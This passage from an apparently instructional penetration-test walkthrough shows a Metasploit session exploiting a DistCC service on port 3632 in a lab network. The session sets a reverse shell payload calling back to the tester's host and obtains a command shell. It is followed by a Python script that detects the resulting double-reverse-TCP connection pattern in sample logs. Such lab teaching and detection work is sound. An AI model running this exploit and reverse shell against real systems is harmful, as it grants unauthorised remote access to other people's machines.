Simulated Penetration Test
when performing the attack. (Remember that in a penetration test we can’t always rely on the defaults to be successful.)

Our scan finds that port 3632 is open and associated with DistCC. An online search tells us that DistCC is a program that distributes builds of C/C++ code to several machines across a network, and it is vulnerable to an attack. (When performing penetration tests, you will often encounter unfamiliar applications and products, and you will need to research the application before you can attack it.)
msf exploit(distcc_exec) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST 172.16.32.129
LHOST => 172.16.32.129
msf exploit(distcc_exec) > set RHOST 172.16.32.162
RHOST => 172.16.32.162
msf exploit(distcc_exec) > show payloads
Compatible Payloads
===================

   Name                    Rank    Description
   ----                    ----    -----------
   cmd/unix/bind_perl      normal  Unix Command Shell, Bind TCP (via perl)
   cmd/unix/bind_ruby      normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/generic        normal  Unix Command, Generic command execution
   cmd/unix/reverse        normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl   normal  Unix Command Shell, Reverse TCP (via perl)
   cmd/unix/reverse_ruby   normal  Unix Command Shell, Reverse TCP (via Ruby)
msf exploit(distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo q6Td9oaTrOkXsBXS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "q6Td9oaTrOkXsBXS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.32.129:4444 -> 172.16.32.162:47002) at 2010-05-22 00:08:04 -0400
whoami
daemon
mkdir /root/moo
mkdir: cannot create directory '/root/moo': Permission denied
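The session above also shows what this payload looks like from the network side: the handler accepts two client connections from the DistCC host seconds after it was contacted on port 3632. The following is an added example, not code from the book, of how a defender could hunt for that pattern in connection logs; the log lines and the 10-second window are constructed assumptions.

```python
"""Flag the footprint of the 'double reverse TCP' shell seen above: a host that
was just contacted on DistCC's port 3632 then opens two outbound TCP
connections to the same remote address:port within a few seconds.
The log records below are constructed for this example."""
from datetime import datetime, timedelta

# Constructed records, one per line: timestamp src sport dst dport.
SAMPLE_LOG = """\
2010-05-22T00:07:59 172.16.32.129 51020 172.16.32.162 3632
2010-05-22T00:08:03 172.16.32.162 47001 172.16.32.129 4444
2010-05-22T00:08:04 172.16.32.162 47002 172.16.32.129 4444
2010-05-22T00:08:30 172.16.32.150 40011 172.16.32.129 4444
"""

DISTCC_PORT = 3632


def parse_log(text):
    """Parse the whitespace-separated records into (ts, src, sport, dst, dport)."""
    recs = []
    for line in text.splitlines():
        ts, src, sport, dst, dport = line.split()
        recs.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return recs


def find_double_reverse(recs, window=timedelta(seconds=10)):
    """Return sorted (distcc_host, remote, port) tuples for each host that received
    an inbound connection on DISTCC_PORT and, inside `window` after it, opened two
    or more outbound connections to one remote address:port (assumed window)."""
    hits = set()
    for ts0, _, _, dst0, dport0 in recs:
        if dport0 != DISTCC_PORT:
            continue
        # Every outbound connection the DistCC host made inside the window.
        outs = [(ts, dst, dport) for ts, src, _, dst, dport in recs
                if src == dst0 and ts0 <= ts <= ts0 + window]
        for _, dst, dport in outs:
            same_target = [o for o in outs if o[1] == dst and o[2] == dport]
            if len(same_target) >= 2:
                hits.add((dst0, dst, dport))
    return sorted(hits)


if __name__ == "__main__":
    for host, remote, port in find_double_reverse(parse_log(SAMPLE_LOG)):
        print(f"{host}: two outbound connections to {remote}:{port} after a 3632 hit")
```

The third record (a different host connecting once to port 4444) is deliberately not flagged, since it was never contacted on 3632 and made only one connection.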